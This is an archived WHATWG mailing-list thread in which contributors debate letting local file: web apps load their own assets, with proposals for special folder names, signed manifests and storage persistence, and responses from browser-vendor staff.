2017-04-18 10:52:10 UTC
Permalink
Post by duanyao
Maybe no. "files" is a generic word, so if you make every "xxx_files/"
folders magical, it's quite possible that there are folders happen to
ends with "_files" but are not intented to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for muli-page app.
This is why I propose a new (and unlikely already used) pattern
`xxx_webrun/` for more powerful muli-page app, and limit `xxx_files/` to
single page app.
In single page app case, it would be more common that `test.html` gets
`test_files\page{2|3}.html` via XHR and renders the latter in place,
instead of navigating to it.
So the latter don't need to access `test_files\config.json` themselves.
*any* magic behavior is a sure-fire sign that something is wrong(TM)


Thanks,
Ash
duanyao
2017-04-18 11:18:57 UTC
Permalink
Post by Ashley Sheridan
Post by duanyao
Maybe no. "files" is a generic word, so if you make every "xxx_files/"
folders magical, it's quite possible that there are folders happen to
ends with "_files" but are not intented to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for muli-page app.
This is why I propose a new (and unlikely already used) pattern
`xxx_webrun/` for more powerful muli-page app, and limit `xxx_files/` to
single page app.
In single page app case, it would be more common that `test.html` gets
`test_files\page{2|3}.html` via XHR and renders the latter in place,
instead of navigating to it.
So the latter don't need to access `test_files\config.json` themselves.
*any* magic behavior is a sure-fire sign that something is wrong(TM)
Maybe. But there are occasions where magic is unavoidable. E.g. how to
infer the MIME type of a file? filename extension? magic numbers? all
are magic.

If the barrier is not high enough, name it `xxx__webrun__/`.
Ashley Sheridan
2017-04-18 11:27:46 UTC
Permalink
Post by duanyao
Post by Ashley Sheridan
Post by duanyao
Maybe no. "files" is a generic word, so if you make every "xxx_files/"
folder magical, it's quite possible that there are folders that happen
to end with "_files" but are not intended to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for a multi-page app.
This is why I propose a new (and unlikely already-used) pattern,
`xxx_webrun/`, for more powerful multi-page apps, and limit
`xxx_files/` to single-page apps.
In the single-page app case, it would be more common that `test.html`
gets `test_files\page{2|3}.html` via XHR and renders the latter in
place, instead of navigating to it, so the latter doesn't need to
access `test_files\config.json` itself.
Post by Ashley Sheridan
*any* magic behavior is a sure-fire sign that something is wrong(TM)
Maybe. But there are occasions where magic is unavoidable. E.g. how do
we infer the MIME type of a file? Filename extension? Magic numbers?
All are magic.
If the barrier is not high enough, name it `xxx__webrun__/`.
But when you're talking about security, which we are, relying on magic anything is potentially disastrous.

You mention mime types and file extensions, both of which are not safe to rely on for anything related to security, hence there being entire libraries and frameworks to attempt to determine and test a file's real type (Windows still fails abysmally in this area though).

Just relying on magic filenames *will* fail. Consider the scenario where a file is accidentally copied over the original entry html. Now it's associated with the wrong directory of assets and other 'linked' files. This new html entry point file could easily be an exploited file, looking to grab whatever data is being held locally on your machine.
Thanks,
Ash
duanyao
2017-04-18 12:03:07 UTC
Permalink
Post by Ashley Sheridan
Post by duanyao
Post by Ashley Sheridan
Post by duanyao
Maybe no. "files" is a generic word, so if you make every "xxx_files/"
folder magical, it's quite possible that there are folders that happen
to end with "_files" but are not intended to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for a multi-page app.
This is why I propose a new (and unlikely already-used) pattern,
`xxx_webrun/`, for more powerful multi-page apps, and limit
`xxx_files/` to single-page apps.
In the single-page app case, it would be more common that `test.html`
gets `test_files\page{2|3}.html` via XHR and renders the latter in
place, instead of navigating to it, so the latter doesn't need to
access `test_files\config.json` itself.
Post by Ashley Sheridan
*any* magic behavior is a sure-fire sign that something is wrong(TM)
Maybe. But there are occasions where magic is unavoidable. E.g. how do
we infer the MIME type of a file? Filename extension? Magic numbers?
All are magic.
If the barrier is not high enough, name it `xxx__webrun__/`.
But when you're talking about security, which we are, relying on magic anything is potentially disastrous.
You mention mime types and file extensions, both of which are not safe to rely on for anything related to security, hence there being entire libraries and frameworks to attempt to determine and test a file's real type (Windows still fails abysmally in this area though).
Those libraries and frameworks *will* fail, because it is entirely
possible for a file to conform to multiple formats simultaneously.
Also, the methodology used by those libraries and frameworks is itself
magic.
Post by Ashley Sheridan
Just relying on magic filenames *will* fail. Consider the scenario where a file is accidentally copied over the original entry html. Now it's associated with the wrong directory of assets and other 'linked' files. This new html entry point file could easily be an exploited file, looking to grab whatever data is being held locally on your machine.
Sure, it is possible, but usually the damage is limited because the
entry file can only access a limited folder, `XXX_files`. By
accidentally overwriting an HTML file, you already cause data loss in
the first place.
duanyao
2017-04-18 14:08:53 UTC
Permalink
Post by Ashley Sheridan
Post by duanyao
Post by Ashley Sheridan
Post by duanyao
Maybe no. "files" is a generic word, so if you make every "xxx_files/"
folder magical, it's quite possible that there are folders that happen
to end with "_files" but are not intended to be local web apps. If you
require a `xxx.html` to make "xxx_files/" magical, it is a little
awkward and confusing for a multi-page app.
This is why I propose a new (and unlikely already-used) pattern,
`xxx_webrun/`, for more powerful multi-page apps, and limit
`xxx_files/` to single-page apps.
In the single-page app case, it would be more common that `test.html`
gets `test_files\page{2|3}.html` via XHR and renders the latter in
place, instead of navigating to it, so the latter doesn't need to
access `test_files\config.json` itself.
Post by Ashley Sheridan
*any* magic behavior is a sure-fire sign that something is wrong(TM)
Maybe. But there are occasions where magic is unavoidable. E.g. how do
we infer the MIME type of a file? Filename extension? Magic numbers?
All are magic.
If the barrier is not high enough, name it `xxx__webrun__/`.
But when you're talking about security, which we are, relying on magic
anything is potentially disastrous.
You mention mime types and file extensions, both of which are not safe
to rely on for anything related to security, hence there being entire
libraries and frameworks to attempt to determine and test a file's real
type (Windows still fails abysmally in this area though).
Just relying on magic filenames *will* fail. Consider the scenario
where a file is accidentally copied over the original entry html. Now
it's associated with the wrong directory of assets and other 'linked'
files. This new html entry point file could easily be an exploited
file, looking to grab whatever data is being held locally on your
machine.
If a local web app is really critical, it may be digitally signed to
prevent tampering. For example, signatures and certificates can be
placed in `foo_files/META-INF/` or `foo_webrun/META-INF/` (like a
signed jar). A browser can detect a change to any file within the web
app when loading it, and refuse to run it.

Signing with a self-signed cert should be enough to detect accidental
damage, and browsers could do this every time they save a web page.
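(A rough sketch of the kind of integrity check this implies, using the
standard Web Crypto digest API against a hypothetical
META-INF/manifest.json listing SHA-256 hashes; real signature
verification over the manifest is omitted:)

  // Verify each file of the app against a hash manifest of the form
  // { "page2.html": "<hex sha-256>", ... } before letting it run.
  async function verifyApp(rootURL, manifest) {
    for (const [path, expectedHex] of Object.entries(manifest)) {
      const buf = await (await fetch(rootURL + path)).arrayBuffer();
      const digest = await crypto.subtle.digest('SHA-256', buf);
      const hex = Array.from(new Uint8Array(digest))
        .map(b => b.toString(16).padStart(2, '0')).join('');
      if (hex !== expectedHex) {
        throw new Error('Tampered file: ' + path);
      }
    }
  }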
Ian Hickson
2017-04-18 18:23:32 UTC
Permalink
The main thing that seems to be missing from this thread is any commitment
from any browser vendors to actually support any changes in this space. I
would recommend the following steps for anyone hoping to push changes to
Web specifications on this topic:

- Approach Web browser vendors privately, to see if they are interested in
changing their behaviour in this space.

- If you find interest, collect up the use cases that you want to address,
and post them to this list for discussion.

- Collect the input on use cases and try to design a solution that
fits all the important use cases, then send an e-mail to this list
proposing a basic design.

Cheers,
--
Ian Hickson

😸
duanyao
2017-04-19 03:45:20 UTC
Permalink
Post by Ian Hickson
The main thing that seems to be missing from this thread is any
commitment from any browser vendors to actually support any changes in
this space.
Yes, and I had been pessimistic about that even before I joined this thread.
 
Actually I joined the discussion mainly to see whether there are some
convincing reasons for web standards and browsers to ignore local files.
Comments from browser vendors on this would be more than welcome.

Something already mentioned:
 
* Local files are against the philosophy of the Web.
Then the problem is what exactly the philosophy of the Web is, and why;
that still seems unclear.
 
* Accessing local files from local files with JavaScript is insecure.
Some solutions (including mine) have been discussed, and I think this
is solvable. Please comment if anyone thinks otherwise.
 
* Accessing local files is not portable.
I think with some best practices in mind a local web app can be quite
portable. I'd like to see counterexamples if anyone has some.
 
* A local HTTP server could be an alternative.
The problems of a local HTTP server have been discussed in detail.
 
* Electron/NW.js etc. could be alternatives.
It is overkill to ship a small web app with a large runtime,
especially when the advanced desktop features are not needed.
The enormous manpower devoted to Electron/NW.js and similar projects
is a signal that local web apps are relevant.
 
Something not mentioned here, just my guess:
 
* Local web apps are against the business model of the current Internet.
Please consider users first.
 
* The cloud is the future; local files will become irrelevant.
That seems premature, and there are people who feel uncomfortable
moving all their personal data and workflows into the cloud.
Post by Ian Hickson
I would recommend the following steps for anyone hoping to push
changes to Web specifications on this topic:
- Approach Web browser vendors privately, to see if they are
interested in changing their behaviour in this space.
I have no such private channel.
Post by Ian Hickson
- If you find interest, collect up the use cases that you want to
address, and post them to this list for discussion.
- Collect the input on use cases and try to design a solution that
fits all the important use cases, then send an e-mail to this list
proposing a basic design.
There has been a lot of discussion on that in this thread. Do you think
writing a more formal document would be helpful?
Anne van Kesteren
2017-04-19 08:09:59 UTC
Permalink
There has been a lot of discussion on that in this thread. Do you think writing a more formal document would be helpful?
Perhaps. Fundamentally, I don't think you've made a compelling enough
case for folks to become interested and wanting to work in this space
and help you solve your problem. You've also been fairly
dismissive of the alternative points of view, such as the web being
fundamentally linked to HTTP and that distributing (offline)
applications over HTTP is the goal. That might make folks less
compelled to engage with you.

I suspect no browser, and I'm pretty certain about Mozilla since I
work there, is interested in furthering file URLs. Most new operating
systems abstract away the file system, and the web as browsers see it
has always done that. There are ways to pull files in, but there's not
much use for letting applications write them out again (other than
downloads, which are quite a bit different).
--
https://annevankesteren.nl/
duanyao
2017-04-19 09:08:32 UTC
Permalink
Post by Anne van Kesteren
There has been a lot of discussion on that in this thread. Do you think writing a more formal document would be helpful?
Perhaps. Fundamentally, I don't think you've made a compelling enough
case for folks to become interested and wanting to work in this space
and help you solve your problem. You've also been fairly
dismissive of the alternative points of view, such as the web being
fundamentally linked to HTTP and that distributing (offline)
applications over HTTP is the goal. That might make folks less
compelled to engage with you.
I'm sorry to have made you feel that I have been dismissive of the
alternative points of view.
This is really not intended. I just don't quite understand some of
those points. For example, is "the web being fundamentally linked to
HTTP" just the current state of the industry, or the inherent
philosophy of the web? If the latter, some explanation or a document
would be much appreciated.
Post by Anne van Kesteren
I suspect no browser, and I'm pretty certain about Mozilla since I
work there, is interested in furthering file URLs.
It is very helpful to hear clear signals from browser vendors,
positive or not. Thanks.
Post by Anne van Kesteren
Most new operating
systems abstract away the file system, and the web as browsers see it
has always done that. There are ways to pull files in, but there's not
much use for letting applications write them out again (other than
downloads, which are quite a bit different).
Doesn't the file: protocol also abstract away much of the file system?
What parts make it a bad abstraction?
You mentioned casing and Unicode normalization.
 
I'm not particularly eager for write access myself. Maybe we can
discuss the read and write cases separately.
Anne van Kesteren
2017-04-19 09:28:32 UTC
Permalink
Post by duanyao
This is really not intended. I just don't quite understand some of
those points. For example, is "the web being fundamentally linked to
HTTP" just the current state of the industry, or the inherent
philosophy of the web? If the latter, some explanation or a document
would be much appreciated.
I suspect it's actually a little higher-level than HTTP, with that
indeed being the current state, but the web is about the exchange of
data between computers and definitely sits at a higher level of
abstraction than the particulars of the Linux or Windows file system.
It's hard to define concretely I think, but being platform-independent
and having data addressable from anywhere are important principles.
Post by duanyao
Doesn't the file: protocol also abstract away much of the file system?
What parts make it a bad abstraction?
You mentioned casing and Unicode normalization.
File URLs (it's not a protocol really) are still fundamentally tied to
the file system, including how it's hierarchical and such. And then
indeed there's all the legacy implications of file URLs.
Post by duanyao
I'm not particularly eager for write access myself. Maybe we can
discuss the read and write cases separately.
I already pointed to https://wicg.github.io/entries-api/ as a way to
get access to a directory of files and <input type=file> as a way to
get access to a sequence of files. Both for read access. I haven't
seen any interest to go beyond that.
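
For illustration, a minimal sketch of that read-only directory access
using the directory-upload subset (the element id and the logging are
placeholders):

<input type="file" id="dir" webkitdirectory>
<script>
// The user picks a directory; the page can then read the files
// inside it, but gets no way to write anything back.
document.getElementById('dir').addEventListener('change', event => {
  for (const file of event.target.files) {
    // webkitRelativePath preserves the path within the chosen directory.
    file.text().then(text =>
      console.log(file.webkitRelativePath, text.length));
  }
});
</script>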
--
https://annevankesteren.nl/
duanyao
2017-04-19 10:28:46 UTC
Permalink
Post by Anne van Kesteren
Post by duanyao
This is really not intended. I just don't quite understand some of
those points. For example, is "the web being fundamentally linked to
HTTP" just the current state of the industry, or the inherent
philosophy of the web? If the latter, some explanation or a document
would be much appreciated.
I suspect it's actually a little higher-level than HTTP, with that
indeed being the current state, but the web is about the exchange of
data between computers and definitely sits at a higher level of
abstraction than the particulars of the Linux or Windows file system.
It's hard to define concretely I think, but being platform-independent
and having data addressable from anywhere are important principles.
It's quite helpful, thanks.
If "addressable from anywhere" is a hard requirement, then file: URLs
are doomed on the web, and further discussion would be unnecessary,
though platform independence could be achieved technically.
Post by Anne van Kesteren
Post by duanyao
Doesn't the file: protocol also abstract away much of the file system?
What parts make it a bad abstraction?
You mentioned casing and Unicode normalization.
File URLs (it's not a protocol really) are still fundamentally tied to
the file system, including how it's hierarchical and such. And then
indeed there's all the legacy implications of file URLs.
Post by duanyao
I'm not particularly eager for write access myself. Maybe we can
discuss the read and write cases separately.
I already pointed to https://wicg.github.io/entries-api/ as a way to
get access to a directory of files and <input type=file> as a way to
get access to a sequence of files. Both for read access. I haven't
seen any interest to go beyond that.
Well, I meant accessing local files from local files without user
actions (e.g. XHR/fetch), mainly to load a web app's own assets.
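
For example, something as small as the following is what gets blocked
on file: today, even though the identical code works over http(s); the
asset path and init function are hypothetical:

// Load the app's own config, shipped alongside the page itself.
// Served over http(s) this just works; from a file: page most
// browsers reject it as a cross-origin request.
fetch('app_files/config.json')
  .then(response => response.json())
  .then(config => initApp(config)); // initApp: hypothetical entry point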
Joshua Bell
2017-04-19 19:35:22 UTC
Permalink
Post by Anne van Kesteren
I already pointed to https://wicg.github.io/entries-api/ as a way to
get access to a directory of files and <input type=file> as a way to
get access to a sequence of files. Both for read access. I haven't
seen any interest to go beyond that.
Post by Roger Hågensen
Is this the Filesystem & FileWriter API?
A small subset of the functionality specified in FileSystem was used by
Chrome to expose directory upload. Support for the subset necessary for
directory-upload interop has been implemented by Firefox and Edge. I put
up the entries-api spec to try to re-specify just that subset. (It's a
work in progress.)
Post by Roger Hågensen
This was added to Chrome/Opera under the webkit prefix 7 years ago; Edge
and Firefox have not picked this up yet (just the Reader part),
as shown by http://caniuse.com/#search=file .
The market apparently demonstrates that a sandboxed file system storage API
isn't high priority for browser vendors to implement.
Post by Roger Hågensen
I avoid prefixed features, and try to use only features that the latest
Edge/Chrome/Firefox support, so that end users are less likely to end up
in a situation where their browser does not support an app.
And unless I remember wrongly, Firefox did support this at some point,
then removed it again.
Take for example my soundbank app.
An end user would want to either use a file selector or drag'n'drop to
the app (browser) window to add files to the soundboard.
Let us assume that 30+ sounds are added (I don't even think the file
requester handles multi-selection properly in all browsers today).
Would it be fair to expect the user to have to re-add these each time
they start/open the app? During a week that is a lot of pointless work.
Saving filenames is not practical, and even if it were, there would be
no paths.
And storing the sounds in IndexedDB or localStorage is out of the
question, as that is limited to a total of 5MB or even less in most
browsers; 30+ samples easily consume that.
You may want to check again. An origin typically gets an order of magnitude
more storage than that for Indexed DB across browsers and devices.
Post by Roger Hågensen
The ideal here is to make an HTML soundboard app locally (i.e. file://),
then copy it as-is to a webserver. Users can either use it from there
(http:// or https://, online and/or offline) or "Save As" the document
and use it locally (file://) for preservation or offline use without a
server dependency.
The only way to make this work currently is to make the user hand-write
the path (full or relative) to each sound and store that in localStorage
along with volume and fade in/out.
But fade in and out is "faked" by adjusting the <audio> volume, as CORS
prevents processing the audio and doing a proper crossfade between
sounds.
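
(For reference, such a crossfade is straightforward with the Web Audio
API once the samples are actually readable, i.e. not CORS-blocked; the
timing parameters below are illustrative:)

// Fade a decoded buffer in and out with a GainNode (Web Audio API).
const ctx = new AudioContext();
function playWithFade(buffer, when, fadeIn, fadeOut, duration) {
  const source = ctx.createBufferSource();
  const gain = ctx.createGain();
  source.buffer = buffer;
  source.connect(gain);
  gain.connect(ctx.destination);
  gain.gain.setValueAtTime(0, when);
  gain.gain.linearRampToValueAtTime(1, when + fadeIn);   // fade in
  gain.gain.setValueAtTime(1, when + duration - fadeOut);
  gain.gain.linearRampToValueAtTime(0, when + duration); // fade out
  source.start(when);
}
// A crossfade is then just two overlapping playWithFade() calls.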
I can understand limitations due to security concerns, but arbitrary
limitation of functionality baffles me.
I do not see much difference between file:// and http(s):// besides one
allowing server-side data processing and HTTP headers, but these days
most apps are entirely client-side. A sample editor can be written that
is fully client-side, even including mic recording, normalizing, and FX;
the server is not involved in any stage except delivering the .html file
plus a few lines of headers. The web app itself is identical (i.e.
hash/checksum identical) between the two.
The benefit is that "the app is the source code", which is an ideal goal
of open source, as anyone can review, copy, and modify it as they please.
And in theory it could run just as well truly offline/standalone as it
could online, without the need for a local webserver or similar.
I'd dare say that thinking of a web app as something hosted only from a
server via http(s) is an antiquated idea.
These days a "web" app can be hosted via anything; want to open a web
app that is served from cloud storage like Dropbox? Not a problem.
Well, almost not a problem: a cloud storage service probably does not
have the proper CORS headers to allow a sample editor to process sound
from local files or files stored on a different cloud service.
And a soundboard or a sample editor are just two examples; an image or
video editor would have similar issues. Or what about a game with mod
support? Being able to drag'n'drop a mod onto a game and then have the
game load it the next time you start the game would be a huge benefit.
But currently this cannot be done; the mod would have to be uploaded to
the server the game is served from, even if the game itself does not use
or need any server-side scripting.
Or imagine a medical app that needs to read in CSV data; such an app
could work fully offline/locally and load up the data each time it's
started. Storing the data in localStorage/IndexedDB would be limited by
whatever else is stored as far as size goes, and browsers can just wipe
local storage/IndexedDB without warning. At least a local file stored in
d:\docs\ is safe from vanishing.
Even if the app itself is online and served from a server, you still
can't have it load a list.CSV from d:\docs\ when starting, for example.
And IndexedDB/localStorage is limited to around 5MB total for that
domain. Maybe there is a desire to switch between datasets list1.csv,
list2.csv, and list3.csv, and before you know it you open xray.png,
enhance an area, and save that change (in localStorage; since you can't
save just the path and a zoom value, you have to save the entire image
instead), and suddenly list1.csv gets deleted.
One of the ideas you're highlighting here is around allowing web apps to
access local files in a read/write fashion, possibly in a persistent way.
There's been some discussion about that at:
https://github.com/WICG/writable-files
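
(Purely as a sketch of the shape being discussed there; none of this is
a shipped API, and every name below is hypothetical:)

// Hypothetical flow: the user grants access to a directory once, and
// the app can re-read and re-write files in it on later visits.
async function updateDataset() {
  const dir = await window.requestWritableDirectory(); // hypothetical API
  const file = await dir.getFile('list1.csv');         // hypothetical
  const text = await file.text();
  await dir.writeFile('list1.csv', processCsv(text));  // both hypothetical
}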

....

On the topic of file:// behavior - the history of support in browsers is
instructive here. Early browsers (naively) assumed that local content
could be fully trusted, more so than content served over HTTP (think IE
security zones). As the web security model has evolved, the capabilities
granted to file:// content have become more and more restricted over the
years. I expect that trend to continue rather than reverse.
Yay295
2017-04-19 19:55:01 UTC
Permalink
Maybe a solution then would be to provide a way to request more storage
space?
Anne van Kesteren
2017-04-20 07:59:48 UTC
Permalink
Post by Yay295
Maybe a solution then would be to provide a way to request more storage
space?
Sounds like it. At least in Firefox https://storage.spec.whatwg.org/
will provide that soonish, including the guarantee that the browser
won't remove your application data unless the user asks it to do so.
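
A minimal sketch of what that looks like with the Storage standard
(persisted storage is exempt from automatic eviction; both calls are
feature-detected since support varies):

// Ask the browser to make this origin's storage persistent, so
// IndexedDB data is not silently evicted under storage pressure.
if (navigator.storage && navigator.storage.persist) {
  navigator.storage.persist().then(granted =>
    console.log(granted ? 'storage will persist' : 'storage may be evicted'));
}
// Check how much this origin may store (typically far more than 5MB).
if (navigator.storage && navigator.storage.estimate) {
  navigator.storage.estimate().then(({usage, quota}) =>
    console.log('using ' + usage + ' of ' + quota + ' bytes'));
}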

(This is why it's always good to start with use cases, examples, and
general problem descriptions, before delving into specific solutions
that may or may not solve the problem.)
--
https://annevankesteren.nl/
Richard Maher
2017-04-18 22:36:20 UTC
Permalink
Post by Ian Hickson
The main thing that seems to be missing from this thread is any commitment
from any browser vendors to actually support any changes in this space.
It has been my experience that browser vendors, more often than not, require at least a (proposed) standard before they will consider implementing a requested feature.

While I personally find the inordinate level of effort and debate that goes into offline-first functionality frustrating, I would certainly not seek to stifle debate or censor someone else from having their say.

Background geolocation can work via service workers for fleet management even in the complete absence of an instantiated UA, and definitely requires the WWW to function; but then I'm all for Web functionality, network connectivity, IoT, and so on.
Ian Hickson
2017-04-18 22:46:46 UTC
Permalink
Post by Ian Hickson
The main thing that seems to be missing from this thread is any
commitment from any browser vendors to actually support any changes in
this space.
Post by Richard Maher
It has been my experience that browser vendors, more often than not,
require at least a (proposed) standard before they will consider
implementing a requested feature.
That's a different question. I was saying we should make sure the browser
vendors care about this space at all. Requesting a specific feature be
implemented comes much later, after use case collection and API design
stages.

If the browser vendors feel like this is out of scope for their product,
then spending the (quite extensive) effort to design a solution will be
wasted. I wouldn't want anyone on this list to feel their time is wasted.


Post by Richard Maher
I would certainly not seek to stifle debate or censor someone else from
having their say.
Indeed not! I should hope nobody would feel that way. The WHATWG is a venue
that is open to anyone willing to take part in relevant technical debate.
--
Ian Hickson

😸
Richard Maher
2017-04-18 22:58:57 UTC
Permalink
Post by Ian Hickson
If the browser vendors feel like this is out of scope for their product,
then spending the (quite extensive) effort to design a solution will be
wasted. I wouldn't want anyone on this list to feel their time is wasted.
I also do not like to see W3C’s valuable time continually wasted on specifying functionality that has expressly been dismissed by major browser vendors. For example:

https://www.w3.org/TR/geofencing/
and
https://bugs.chromium.org/p/chromium/issues/detail?id=383125#c46
Post by Ian Hickson
Indeed not! I should hope nobody would feel that way. The WHATWG is a venue
that is open to anyone willing to take part in relevant technical debate.
Then please stop censoring my posts or manufacturing chicken-and-egg prerequisites for topics you are not interested in.

